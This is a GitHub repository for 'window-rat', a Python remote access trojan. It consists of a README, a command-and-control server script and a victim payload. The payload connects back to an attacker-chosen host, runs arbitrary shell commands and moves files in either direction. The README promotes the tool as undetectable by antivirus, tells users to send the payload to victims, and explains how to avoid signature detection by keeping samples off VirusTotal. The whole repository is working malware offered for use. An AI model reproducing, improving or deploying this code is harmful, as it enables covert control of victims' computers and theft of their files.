├── LICENSE ├── README.md ├── c2.py └── payload.py /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021 sikander 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # window-rat: 2 | 3 | # NOTE: 4 | Use new Cross Plaftorm FUD RAT https://github.com/machine1337/pyFUD 5 | # Introduction: 6 | A Fully Undectable Window RAT that bypass window 10 Defender protection and also bypass 99.9% of other antivirus protections. 7 | 8 | ![c2a](https://user-images.githubusercontent.com/82051128/201597249-39a6b071-1277-4bbf-a720-f9d1aa537d0e.png) 9 | 10 | # C2 Server Requirements:- 11 | pip install termcolor 12 | pip install pyfiglet 13 | 14 | # Installation: 15 | 1. git clone https://github.com/machine1337/window-rat 16 | 2. pip install -r requirements.txt 17 | 3. python3 c2.py (your command server from where u will handle targets) 18 | 4. payload.py (your payload u will send to victim) 19 | 5. IP and Port in both payload.py and server.py Must be same 20 | 21 | # Usage: 22 | 1. python3 c2.py 23 | 2. Now enter IP (your IP or server in which u want to get reverse shell) 24 | 3. Now enter PORT (which port u want to connect) 25 | 4. Listener will be started 26 | 5. Now go to payload.py line no. 36 and put ip and port of server s.connect(('ipserver', portserver)) 27 | 6. test the payload.py on victim system 28 | 29 | # Commands:- 30 | -> C2 SERVER COMMANDS: 31 | ![c21](https://user-images.githubusercontent.com/82051128/201598677-206191a5-c671-4007-9f9a-402db123ec99.png) 32 | 33 | -> After Got Connection (type help) 34 | ![shellc2](https://user-images.githubusercontent.com/82051128/201598869-0b6fe1c8-9ed6-4e4b-997d-42f66a59f0ca.png) 35 | 36 | # Warning: 37 | 1. Don't Upload Any Payloads To VirusTotal.com Bcz This tool will not work 38 | with Time. 39 | 2. Virustotal Share Signatures With AV Comapnies. 40 | 3. Again Don't be an Idiot! 41 | 42 | # Features: 43 | 1. Very Simple And Fully Undectable RAT For Windows 44 | 2. Multi Client Handling 45 | 3. Persistent Shell 46 | 4. Upload File 47 | 5. Download File 48 | 4. Once Victim Execute the Payload And We got Shell Then Victim Can't Remove the payload 49 | Until the Shell is Open In Attacker System. 50 | 5. U can Convert payload.py to exe using pyinstaller tool in windows. 51 | 52 | # Note: 53 | Don't upload exe format to virustotal as I have already uploaded 54 | Ps payload to virustotal. or u can check this file on nodistribute.com because they 55 | don't submit signatures to antivirus companies. 56 | Reason: They will submit this payload to different AV companies 57 | And as a result this script will not work w.r.t time. 58 | # Contact: 59 | Telegram Group: https://t.me/machine1337 60 | 61 | # Donations: 62 | BTC Address: 3Dvzx2RKMR731VSEPXXgPyBq6Ln4JJdYPD 63 | 64 | 65 | 66 | # Warning: 67 | Use this tool Only for Educational Purpose And I will Not be Responsible For ur cruel act. 68 | 69 | 70 | -------------------------------------------------------------------------------- /c2.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import json 3 | import os 4 | import threading 5 | print("[*] Checking Requirements Module.....") 6 | try: 7 | import termcolor 8 | except ImportError: 9 | os.system("pip install termcolor -q -q -q") 10 | import termcolor 11 | from termcolor import colored 12 | try: 13 | import pyfiglet 14 | except ImportError: 15 | os.system("pip install pyfiglet -q -q -q") 16 | import pyfiglet 17 | def logo(): 18 | ascii_banner = pyfiglet.figlet_format(" {C2 S3RV3R}").upper() 19 | print(colored(ascii_banner.rstrip("\n"), 'cyan', attrs=['bold'])) 20 | print(colored(" Type:- usage \n", 'magenta', attrs=['bold'])) 21 | print(colored(" \n", 'magenta', attrs=['bold'])) 22 | 23 | def reliable_recv(target): 24 | data = '' 25 | while True: 26 | try: 27 | data = data + target.recv(1024).decode().rstrip() 28 | return json.loads(data) 29 | except ValueError: 30 | continue 31 | 32 | def reliable_send(target, data): 33 | jsondata = json.dumps(data) 34 | target.send(jsondata.encode()) 35 | 36 | def upload_file(target, file_name): 37 | f = open(file_name, 'rb') 38 | target.send(f.read()) 39 | 40 | def download_file(target, file_name): 41 | f = open(file_name, 'wb') 42 | target.settimeout(1) 43 | chunk = target.recv(1024) 44 | while chunk: 45 | f.write(chunk) 46 | try: 47 | chunk = target.recv(1024) 48 | except socket.timeout as e: 49 | break 50 | target.settimeout(None) 51 | f.close() 52 | 53 | 54 | def target_communication(target, ip): 55 | count = 0 56 | while True: 57 | command = input('* Victim~%s: ' % str(ip)) 58 | reliable_send(target, command) 59 | if command == 'quit': 60 | break 61 | elif command == 'background': 62 | break 63 | elif command == 'clear': 64 | os.system('clear') 65 | elif command[:3] == 'cd ': 66 | pass 67 | elif command[:6] == 'upload': 68 | upload_file(target, command[7:]) 69 | elif command[:8] == 'download': 70 | download_file(target, command[9:]) 71 | elif command == 'help': 72 | print(termcolor.colored('''\n 73 | quit --> Quit Session With The Target 74 | clear --> Clear The Screen 75 | cd *Directory Name* --> Changes Directory On Target System 76 | upload *file name* --> Upload File To The target Machine 77 | download *file name* --> Download File From Target Machine'''),'green') 78 | else: 79 | result = reliable_recv(target) 80 | print(result) 81 | 82 | def restart(self) -> bool: 83 | reliable_send(['res']) 84 | return reliable_send() 85 | def accept_connections(): 86 | while True: 87 | if stop_flag: 88 | break 89 | sock.settimeout(1) 90 | try: 91 | target, ip = sock.accept() 92 | targets.append(target) 93 | ips.append(ip) 94 | print(termcolor.colored(str(ip) + ' has connected!', 'green')) 95 | except: 96 | pass 97 | os.system('cls' if os.name == 'nt' else 'clear') 98 | logo() 99 | try: 100 | abc = input(termcolor.colored("[*] Enter Your ip: ", 'blue')) 101 | cde = int(input(termcolor.colored("[*] Enter Your Port: ", 'cyan'))) 102 | targets = [] 103 | ips = [] 104 | stop_flag = False 105 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 106 | sock.bind((f'{abc}', cde)) 107 | sock.listen(5) 108 | t1 = threading.Thread(target=accept_connections) 109 | t1.start() 110 | print(termcolor.colored('[+] Listening For The Incoming Connections ...', 'yellow')) 111 | print() 112 | try: 113 | while True: 114 | command = input('[+] C2@Server:- ') 115 | if command == 'targets': 116 | counter = 0 117 | for ip in ips: 118 | print('Session ' + str(counter) + ' --- ' + str(ip)) 119 | counter += 1 120 | elif command == 'clear': 121 | os.system('clear') 122 | elif command == 'cls': 123 | os.system('cls') 124 | elif command == 'usage': 125 | print(termcolor.colored('''\n 126 | ===Command and Control (C2) Usage=== 127 | targets --> Prints Active Sessions 128 | session *session num* --> Will Connect To Session (background to return) 129 | clear --> Clear Terminal Screen 130 | cls --> clear the windows screen 131 | exit --> Quit ALL Active Sessions and Closes C2 Server!! 132 | kill *session num* --> Issue 'quit' To Specified Target Session 133 | sendall *command* --> Sends The *command* To ALL Active Sessions (sendall notepad) 134 | \n''', 'cyan')) 135 | elif command == 'res': 136 | restart() 137 | elif command[:7] == 'session': 138 | try: 139 | num = int(command[8:]) 140 | tarnum = targets[num] 141 | tarip = ips[num] 142 | target_communication(tarnum, tarip) 143 | except: 144 | print('[-] No Session Under That ID Number') 145 | elif command == 'exit': 146 | for target in targets: 147 | reliable_send(target, 'quit') 148 | target.close() 149 | sock.close() 150 | stop_flag = True 151 | t1.join() 152 | break 153 | elif command[:4] == 'kill': 154 | targ = targets[int(command[5:])] 155 | ip = ips[int(command[5:])] 156 | reliable_send(targ, 'quit') 157 | targ.close() 158 | targets.remove(targ) 159 | ips.remove(ip) 160 | elif command[:7] == 'sendall': 161 | x = len(targets) 162 | print(x) 163 | i = 0 164 | try: 165 | while i < x: 166 | tarnumber = targets[i] 167 | print(tarnumber) 168 | reliable_send(tarnumber, command) 169 | i += 1 170 | except: 171 | print('Failed') 172 | else: 173 | print(termcolor.colored('[!!] Command Doesnt Exist', 'red')) 174 | except KeyboardInterrupt: 175 | print("\nYou Did something Wrong! Restart the C2") 176 | exit() 177 | 178 | except KeyboardInterrupt: 179 | print(termcolor.colored("\nYou Pressed The Exit Button!", 'red')) 180 | quit() 181 | -------------------------------------------------------------------------------- /payload.py: -------------------------------------------------------------------------------- 1 | import socket 2 | import json 3 | import subprocess 4 | import time 5 | import os 6 | def reliable_send(data): 7 | jsondata = json.dumps(data) 8 | s.send(jsondata.encode()) 9 | def reliable_recv(): 10 | data = '' 11 | while True: 12 | try: 13 | data = data + s.recv(1024).decode().rstrip() 14 | return json.loads(data) 15 | except ValueError: 16 | continue 17 | def download_file(file_name): 18 | f = open(file_name, 'wb') 19 | s.settimeout(1) 20 | chunk = s.recv(1024) 21 | while chunk: 22 | f.write(chunk) 23 | try: 24 | chunk = s.recv(1024) 25 | except socket.timeout as e: 26 | break 27 | s.settimeout(None) 28 | f.close() 29 | def upload_file(file_name): 30 | f = open(file_name, 'rb') 31 | s.send(f.read()) 32 | def connection(): 33 | while True: 34 | time.sleep(4) 35 | try: 36 | s.connect(('ipserver', portserver)) 37 | shell() 38 | s.close() 39 | break 40 | except: 41 | connection() 42 | def shell(): 43 | while True: 44 | command = reliable_recv() 45 | if command == 'quit': 46 | break 47 | elif command == 'background': 48 | pass 49 | elif command == 'help': 50 | pass 51 | elif command == 'clear': 52 | pass 53 | elif command[:3] == 'cd ': 54 | os.chdir(command[3:]) 55 | if command[:3] == 'res ': 56 | reliable_send(True) 57 | break 58 | elif command[:6] == 'upload': 59 | download_file(command[7:]) 60 | elif command[:8] == 'download': 61 | upload_file(command[9:]) 62 | elif command[:7] == 'sendall': 63 | subprocess.Popen(command[8:], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin = subprocess.PIPE) 64 | else: 65 | execute = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,stdin=subprocess.PIPE) 66 | result = execute.stdout.read() + execute.stderr.read() 67 | result = result.decode() 68 | reliable_send(result) 69 | 70 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 71 | def catc(): 72 | try: 73 | connection() 74 | except KeyboardInterrupt: 75 | quit() 76 | catc() 77 | 78 | 79 | --------------------------------------------------------------------------------